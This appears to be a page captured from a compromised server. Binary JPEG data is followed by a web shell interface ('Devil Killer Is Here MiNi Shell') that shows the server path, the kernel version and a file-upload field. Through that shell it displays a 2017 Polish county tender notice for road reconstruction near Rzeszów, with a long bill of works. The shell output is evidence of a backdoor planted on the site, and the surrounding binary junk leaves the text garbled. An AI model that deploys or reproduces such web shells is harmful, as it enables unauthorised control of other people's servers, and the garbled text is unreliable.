JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170329/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170329/53972-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zdp.rzeszow.pl/?c=mdTresc-cmPokaz-19' target='_blank'>http://www.zdp.rzeszow.pl/?c=mdTresc-cmPokaz-19</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 53972 - 2017
              z dnia 2017-03-29 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rzeszów: Przebudowa odcinków dróg powiatowych: Nr 1398R Rzeszów  Św. Roch  Chmielnik w km 8+312 do 9+424, Nr 1400R Kielnarowa  Chmielnik - Zabratówka w km od 3+690 do 11+544<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Rzeszowski, krajowy numer identyfikacyjny
              69058141300000, ul.
              ul. Grunwaldzka 
              15,
              35959  
              Rzeszów, woj.
              podkarpackie, państwo
              Polska, tel.
              178 671 463, e-mail
              zampubliczne@powiat.rzeszow.pl, faks
              178 671 964.
              <br />
              Adres strony internetowej (URL): www.powiat.rzeszow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zdp.rzeszow.pl/?c=mdTresc-cmPokaz-19</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />Zarząd Dróg Powiatowych w Rzeszowie, ul. Budziwojska 149, 35-317 Rzeszów, pokój nr 12.</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe  (Dz. U. 2012  poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />Zarząd Dróg Powiatowych w Rzeszowie, 35-317 Rzeszów, ul. Budziwojska 149, pokój nr 12</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa odcinków dróg powiatowych: Nr 1398R Rzeszów  Św. Roch  Chmielnik w km 8+312 do 9+424, Nr 1400R Kielnarowa  Chmielnik - Zabratówka w km od 3+690 do 11+544<br /><b>Numer referencyjny: </b>ZDP-5-DZP/373/PRGiPID/1/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest realizacja zadania pn:
Przebudowa odcinków dróg powiatowych: Nr 1398R Rzeszów  Św. Roch  Chmielnik w km 8+312 do 9+424, Nr 1400R Kielnarowa  Chmielnik -Zabratówka w km od 3+690 do 11+544; 1) Zakres zamówienia obejmuje:
1.	ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE: 
1.1.
Roboty pomiarowe przy liniowych robotach ziemnych, trasa dróg w terenie równinnym - 	8,966	km; 
1.2.	Mechaniczne karczowanie, zagajniki i zarośla gęste - 	0,50	ha;
1.3.	Oczyszczenie terenu z pozostałości po wykarczowaniu, drobne gałęzie, korzenie i kora - 	5 000	m2;
1.4.	Rozebranie nawierzchni z płytek betonowych, grubości 8 cm, na podsypce piaskowej - 	30	m2;
1.5.	Rozebranie nawierzchni z kostki brukowej betonowej, grubości 6 cm, na podsypce cementowo-piaskowej - 	310	m2;
1.6.	Cięcie nawierzchni mechanicznie, 
z mas mineralno-asfaltowych, głębokość 8cm, pod ściek przykrawężnikowy - 	3 930	m;
1.7.	Rozebranie nawierzchni z mieszanek mineralno-bitumicznych, ręcznie, grubość nawierzchni 4cm na zjazdach - 	170	m2;
1.8.	Rozebranie nawierzchni z mieszanek mineralno-bitumicznych, ręcznie, grubość nawierzchni 6cm - 	580	m2;
1.9.	Rozebranie nawierzchni z mieszanek mineralno-bitumicznych, ręcznie, grubość nawierzchni 8cm, pod ściek przykrawężnikowy - 	390	m2;
1.10.	Rozebranie krawężników betonowych, krawężniki 15x30 cm, na podsypce cementowo-piaskowej - 	50	m;
1.11.	Rozebranie obrzeży trawnikowych, obrzeża 8x30 cm na podsypce cementowo-piaskowej - 	40	m;
1.12.	Rozebranie przepustów drogowych, przepusty sklepieniowe kamienno-betonowe - 	30	m3;
1.13.	Rozebranie betonowych ścianek czołowych przepustów i zjazdów płytowych - 	145	m3;
1.14.	Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu, transport samochodem samowyładowczym na odległość 1 km - 	272	m3;
1.15.	Rozebranie przepustów drogowych, rury betonowe o średnicy 40cm - 	24	m;
1.16.	Rozebranie przepustów drogowych, rury betonowe o średnicy 50cm - 	45	m;
1.17.	Rozebranie przepustów drogowych, rury betonowe o średnicy 60cm - 	122	m;
1.18.	Rozebranie przepustów drogowych, rury betonowe o średnicy 80cm - 	88	m;
1.19.	Rozebranie przepustów drogowych, rury betonowe o średnicy 100cm - 	12	m;
1.20.	Wywiezienie rozebranych elementów betonowych przepustów drogowych przy mechanicznym załadowaniu i wyładowaniu, transport samochodem samowyładowczym na odległość do 10 km - 	67	m3;
1.21.	Rozebranie przepustów rurowych pod zjazdami, rury betonowe o średnicy30cm - 	105	m;
1.22.	Rozebranie przepustów rurowych pod zjazdami, rury betonowe o średnicy40cm - 	512	m;
1.23.	Rozebranie przepustów rurowych pod zjazdami, rury betonowe o średnicy50cm - 	51	m;
1.24.	Rozebranie przepustów rurowych pod zjazdami, rury betonowe o średnicy60cm - 	4	m;
1.25.	Demontaż poręczy stalowych na przepuście o wysokości 1,0 m z odwozem w miejsce wskazane przez Inwestora - 	18	m;
1.26.	Zdjęcie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne - 	10	szt;
1.27.	Rozebranie słupków do znaków - 	10	szt;
1.28.	Rozebranie barier energochłonnych stalowych pojedynczych typu SP-04 - 	32	m;
1.29.	Regulacja pionowa studzienek dla urządzeń podziemnych betonem klasy C16/20, kratki ściekowe uliczne istniejące - 	15	szt;
1.30.	Regulacja pionowa studzienek dla urządzeń podziemnych betonem klasy C16/20, włazy kanałowe istniejące - 	2	szt;
1.31.	Regulacja pionowa studzienek dla urządzeń podziemnych betonem klasy C16/20, studzienki telekomunikacyjne istniejące - 	1	szt;
2.
ROBOTY ZIEMNE: 
2.1.
Roboty ziemne koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi do 1 km, grunt kategorii lll - IV - usunięcie humusu grubość warstwy 15cm - 	3 290	m3;
2.2.	Roboty ziemne koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi do 1 km, grunt kategorii lll  IV - 	3 060	m3;
2.3.	Dokop - roboty ziemne koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi, grunt kategorii III (dokop Wykonawca pozyska na własny koszt) - 	9 210	m3;
2.4.	Ręczne formowanie nasypów z ziemi leżącej na odkładzie, kategoria gruntu III-IV - 	3 060	m3;
2.5.	Ręczne formowanie nasypów z ziemi dowożonej samochodami samowyładowczymi, kategoria gruntu III-IV - 	9 210	m3;
2.6.	Zagęszczanie nasypów, ubijakami mechanicznymi, grunt spoisty kategorii III-IV - 	12 270	m3;
2.7.	Plantowanie (obrobienie na czysto), skarp i korony nasypów, kategoria gruntu I-III - 	5 900	m2;
3.
ODWODNIENIE KORPUSU DROGOWEGO (rów kryty + przepusty pod drogą): 
3.1.
Części przelotowe prefabrykowanych przepustów drogowych rurowych 1-otworowych, rury kielichowe żelbetowe produkowane metodą wibroprasowania betonu o średnicy wewnętrznej 60 cm, klasa III, na ławie z tłucznia kamiennego grubości 50 cm i szerokości 100 cm - 	159	m;
3.2.	Części przelotowe prefabrykowanych przepustów drogowych rurowych 1-otworowych, rury kielichowe żelbetowe produkowane metodą wibroprasowania betonu o średnicy wewnętrznej 80 cm, klasa III, na ławie z tłucznia kamiennego grubości 50 cm i szerokości 120 cm - 	144	m;
3.3.	Części przelotowe prefabrykowanych przepustów drogowych rurowych 1-otworowych, rury kielichowe żelbetowe produkowane metodą wibroprasowania betonu o średnicy wewnętrznej 100 cm, klasa III, na ławie z tłucznia kamiennego grubości 50 cm i szerokości 140 cm - 	12	m;
3.4.	Wykonanie przepustu stalowego z blachy falistej o przekroju owalnym o wymiarach minimalnych BxH = 4,02 m x 2,78 m (światło przepustu) wraz z wykonaniem projektu technologicznego przepustu, blacha grubości minimum 4,5mm zabezpieczona antykorozyjnie warstwą ocynku grubości minimum 70 m, na ławie z tłucznia kamiennego grubości 0,5m i szerokości 4,5m, podsypka z pospółki grubości 0,15m - 	20	m;
3.5.	Obudowy wlotów (wylotów) prefabrykowanych przepustów drogowych, przepusty rurowe, beton C20/25 - 	74	m3;
3.6.	Wykonanie oporników i gurtów betonowych z betonu klasy C25/30, betonowanie przy użyciu pompy na samochodzie - 	20	m3;
3.7.	Wykonanie ścianek czołowych przepustu z kamienia łamanego wtopionego 
w beton, kamień grubości min. 30cm, beton klasy C12/15 - 	12	m3;
3.8.	Wykonanie narzutu kamiennego z brzegu, średnia grubość narzutu 40 cm -	30	m2;
3.9.	Ścianki czołowe betonowe dla przepustów rurowych z rur Fi60cm, na ławie 
z tłucznia kamiennego grubości 50 cm - 	2	szt;
3.10.	Dokop - roboty ziemne koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi do 1km, grunt kategorii II - pospółka (materiał Wykonawca pozyska na własny koszt) - 	1 252	m3;
3.11.	Zasypywanie wykopów liniowych, grunt kategorii II - 	1 252	m3;
3.12.	Zagęszczanie nasypów, ubijakami mechanicznymi, grunt sypki kategorii II - 	1 252	m3;
3.13.	Oczyszczanie przepustów pod drogami z namułu, przepusty rurowe i sklepieniowe - 	55	m;
3.14.	Podłoże z materiałów sypkich, pospółka, grubości 20cm - 	1 920	m2;
3.15..	Kanał z rur dwuściennych karbowanych z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 400 mm - 	4 184	m;
3.16.	Kanał z rur dwuściennych karbowanych z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 500 mm - 	604	m;
3.17.	Kanał z rur dwuściennych karbowanych z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 600 mm - 	10	m;
3.18.	Obudowy wylotów kolektorów o średnicy wewnętrznej 40cm, wyloty z betonu C20/25 - 	58	szt;
3.19.	Obudowy wylotów kolektorów o średnicy wewnętrznej 50cm, wyloty z betonu C20/25 - 	10	szt;
3.20.	Obudowy wylotów kolektorów o średnicy wewnętrznej 60cm, wyloty z betonu C20/25 - 	1	szt;
3.21.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 1200 mm, głębokość 1,5 m - 	74	szt;
3.22.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 1200 mm, głębokość 2,0 m - 	25	szt;
3.23.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 1200 mm, głębokość 2,5 m - 	21	szt; 
3.24.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 1200 mm, głębokość 3,0 m - 	3	szt; 
3.25.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 1500 mm, głębokość 2,0 m - 	20	szt; 
3.26.	Studnie rewizyjne z kręgów żelbetowych w gotowym wykopie, kręgi o średnicy wewnętrznej 2000 mm, głębokość 2,5 m - 	3	szt; 
3.27.	Studzienki ściekowe z gotowych elementów, uliczna żelbetowa o średnicy wewnętrznej 500 mm z osadnikiem bez syfonu, z wpustem krawężnikowo-jezdniowym klasy D400 - 	109	szt; 
3.28.	Studzienki ściekowe z gotowych elementów, uliczna żelbetowa o średnicy wewnętrznej 500 mm z osadnikiem bez syfonu, z wpustem ulicznym klasy D400 - 	44	szt; 
3.29.	Przykanaliki z rur typu PCV łączone na uszczelkę gumową o średnicy wewnętrznej 200 mm i grubości ścianki 5,9mm - 	335	m; 
3.30.	Wykonanie odwodnienia liniowego, korytka polimerobetonowe z rusztem żeliwnym - 	15	m; 
3.31.	Ława betonowa, z betonu C12/15, zwykła, pod ściek przykrawężnikowy - 	40	m3; 
3.32.
Nawierzchnie z kostki brukowej betonowej, grubość 6cm, na podsypce cementowo-piaskowej grubości 1 cm, ściek przykrawężnikowy - 	790	
m2; 
4.
PODBUDOWY (krawędź jezdni i przekopy pod przepusty + chodnik): 
4.1.
Koryta wykonywane na poszerzeniach, na jezdniach, grunt kategorii II-IV, głębokość 50cm - 	2 120	m2; 
4.2.	Podbudowy z kruszyw, pospółka, warstwa dolna, grubość warstwy po zagęszczeniu 20 cm, krawędź jezdni i przepusty - 	2 760	m2; 
4.3.	Stabilizacja cementem warstwy pospółki z poz. j.w, grubość podbudowy po zagęszczeniu 20 cm, krawędź jezdni i przepusty - 	2 760	m2; 
4.4.	Podbudowy z kruszyw, tłuczeń, warstwa górna, grubość warstwy po zagęszczeniu 15 cm, krawędź jezdni i przepusty - 	2 760	m2; 
4.5.	Podbudowy z kruszyw, pospółka, warstwa górna, grubość warstwy po zagęszczeniu 15 cm, chodnik - 	9 720	m2; 
4.6.	Podbudowy betonowe, bez dylatacji, grubość warstwy po zagęszczeniu 10 cm, chudy beton, chodnik - 	9 720	m2; 
5.
NAWIERZCHNIE (jezdnia + skrzyżowania): 
5.1.
Nawierzchnie z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1, warstwa asfaltowa wzmacniająca, grubości 6 cm, poszerzenia jezdni i przepusty - 	2 760	m2; 
5.2.	Wykonanie frezowania nawierzchni asfaltowej na zimno, średnia grubość warstwy 5 cm -	6 660	m2; 
5.3.	Oczyszczenie nawierzchni drogowych, mechaniczne, nawierzchnia ulepszona (bitum) - 	46 190	m2; 
5.4.	Skropienie nawierzchni drogowej emulsją asfaltową - 	46 190	m2; 
5.5.	Warstwa profilowa z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1 -  	2 256	t; 
5.6.	Ułożenie geosiatki z włókien szklanych powlekanej asfaltem - 	1 100	m2; 
5.7.	Oczyszczenie nawierzchni drogowych, mechaniczne, nawierzchnia ulepszona (bitum) -  	46 190	m2; 
5.8.	Skropienie nawierzchni drogowej emulsją asfaltową - 	46 190	m2; 
5.9.	Nawierzchnie z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1, warstwa asfaltowa wiążąca grubości 4 cm - 	46 190	m2; 
5.10.	Skropienie nawierzchni drogowej emulsją asfaltową - 	51 270	m2; 
5.11.	Nawierzchnie z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1, warstwa asfaltowa ścieralna grubości 4 cm - 	44 610	m2; 
5.12.	Nawierzchnie z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1, warstwa asfaltowa ścieralna grubości 5 cm - 	6 660	m2; 
6.
CHODNIK (chodnik + pobocza + zjazdy): 
6.1.
Ławy pod krawężniki, betonowa z oporem, beton C12/15 - 	342	m3; 
6.2.
Krawężniki betonowe, wystające 15x30 cm na podsypce cementowo-piaskowej 1:4 grubości 5 cm - 	4 890	m; 
6.3.	Ławy pod obrzeża, betonowa z oporem, beton C12/15 - 	146	m3; 
6.4.	Obrzeża betonowe, 30x8cm na podsypce cementowo-piaskowej 1:4 grubości 4 cm, z wypełnieniem spoin zaprawą cementową - 	4 880	m; 
6.5.	Nawierzchnie z kostki brukowej betonowej, grubość 6 cm, na podsypce cementowo-piaskowej 1:4 grubości 3 cm, kostka szara - 	7 780	m2; 
6.6.	Nawierzchnie z kostki brukowej betonowej, grubość 6 cm, na podsypce cementowo-piaskowej 1:4 grubości 3 cm, kostka czerwona - 	1 940	m2; 
6.7.	Nawierzchnie z tłucznia kamiennego, warstwa górna, grubość warstwy po uwałowaniu 8 cm, pobocza i zjazdy - 	10 425	m2; 
 

7.
URZĄDZENIA BEZPIECZEŃSTWA RUCHU: 				
7.1.
Słupki do znaków drogowych, z rur stalowych, Fi 50mm, słupki z rozbiórki - 	10	szt; 
7.2.	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, powierzchnia do 0,3 m2, znaki z rozbiórki - 	10	szt; 
7.3.	Ustawienie barier ochronnych stalowych SP-04, bariery z rozbiórki - 	16	m; 
7.4.	Ustawienie barier ochronnych stalowych SP-04, zakończenia barier, bariery z rozbiórki - 	16	m; 
7.5.	Ustawienie barier energochłonnych stalowych ze słupkami o przekroju ceowym szerokości 140 mm lub o przekroju sigma szerokości 100 mm, rozstaw słupków  co 4 m, posiadających zabezpieczenie antykorozyjne cynkowe, poziom powstrzymywania  N2, poziom szerokości pracującej  W5, poziom intensywności zderzenia  A   odcinki proste (27 odc.) - 	244	m; 
7.6.	Ustawienie barier energochłonnych stalowych ze słupkami o przekroju ceowym szerokości 140 mm lub o przekroju sigma szerokości 100 mm, rozstaw słupków  co 4 m, posiadających zabezpieczenie antykorozyjne cynkowe, poziom powstrzymywania  N2, poziom szerokości pracującej  W5, poziom intensywności zderzenia  A   zakończenia barier z obniżeniem prowadnic do gruntu (27 odc. początkowych + 25 odc. końcowych) - 	312	m; 
7.7.	Ustawienie barier wygradzających ruch pieszy, segmentowych, moduł o długości do 2500 mm i wysokości 1100 (+długość zakotwienia), rama z rury min.Fi.40 mm, poprzeczka z rury min.Fi.25 mm, szczeblinki z rury min.Fi.16 mm, stalowych posiadających zabezpieczenie antykorozyjne cynkowe - 	350	m; 
8.
ROBOTY WYKOŃCZENIOWE (rowy otwarte + zjazdy + zabezpieczenia skarp): 
8.1.
Wykonanie budowli siatkowo-kamiennych, kosze z siatki stalowej bez wyprawy, kosz o wym. 5x0,5x1,0m wraz z robotami ziemnymi - 	290	m3; 
8.2.	Wykonanie budowli siatkowo-kamiennych, materace z siatki stalowej bez wyprawy, 
o grubości 15 cm wraz z robotami ziemnymi - 	40	m3; 
8.3.	Wykonanie podsypek cementowo-piaskowych 1:4 pod umocnienie skarp rowów płytami prefabrykowanymi, grubość warstwy po ułożeniu 10 cm - 	1 670	m2; 
8.4.	Umocnienie skarp rowów płytami prefabrykowanymi betonowymi wielootworowymi grubości 8 cm, płyty 40x60x8cm - 	1 670	m2; 
8.5.	Ścieki z elementów betonowych, na podsypce cementowo-piaskowej 1:4 grubości 5 cm, grubość prefabrykatów 15cm - 	1 652	m; 
8.6.	Oczyszczanie rowu z namułu, z wyprofilowaniem skarp, grubość namułu 30 cm - 	12 030	m; 
8.7.	Przepusty rurowe pod zjazdami, ławy fundamentowe żwirowe - 	176	m3; 
8.8.	Przepusty rurowe pod zjazdami, rury dwuścienne karbowane z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 400 mm - 	97	m; 
8.9.	Przepusty rurowe pod zjazdami, rury dwuścienne karbowane z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 500 mm - 	296	m; 
8.10.	Przepusty rurowe pod zjazdami, rury dwuścienne karbowane z tworzywa sztucznego o sztywności obwodowej SN8, średnica wewnętrzna 600 mm - 	48	m; 
8.11.	Ścianki czołowe betonowe dla przepustów rurowych z rur o średnicy wewnętrznej 60cm, na ławie z tłucznia kamiennego grubości 50 cm - 	16	szt; 
